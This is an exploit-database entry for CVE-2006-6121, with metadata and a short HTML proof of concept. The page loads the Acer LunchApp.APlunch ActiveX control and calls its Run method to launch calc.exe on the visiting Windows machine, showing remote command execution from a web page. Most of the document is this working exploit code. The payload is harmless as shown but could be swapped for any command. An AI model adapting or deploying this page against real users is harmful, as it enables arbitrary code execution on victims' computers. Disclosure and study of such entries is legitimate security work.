Acer LunchApp.APlunch - ActiveX Control Command Execution

Author: Tan Chew Keong
type: remote
platform: windows
port: 
date_added: 2006-11-29  
date_updated: 2016-09-16  
verified: 1  
codes: CVE-2006-6121  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2866.html  

<!--
Author: Tan Chew Keong
Site: http://vuln.sg/
Acer Notebook LunchApp.APlunch ActiveX Control Command Execution Exploit
-->

<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>

# milw0rm.com [2006-11-30]